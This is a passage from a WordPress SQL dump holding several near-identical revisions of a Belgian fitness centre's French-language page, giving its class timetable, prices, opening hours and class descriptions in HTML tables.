(164, 1, '2013-07-03 16:27:40', '2013-07-03 16:27:40', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td class=\"ttitre\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:27:40', '2013-07-03 16:27:40', '', 11, 'http://www.crosstrainingcenter.be/?p=164', 0, 'revision', '', 0),
(167, 1, '2013-07-03 16:30:33', '2013-07-03 16:30:33', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:30:33', '2013-07-03 16:30:33', '', 11, 'http://www.crosstrainingcenter.be/?p=167', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(168, 1, '2013-07-03 16:32:37', '2013-07-03 16:32:37', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:32:37', '2013-07-03 16:32:37', '', 11, 'http://www.crosstrainingcenter.be/?p=168', 0, 'revision', '', 0),
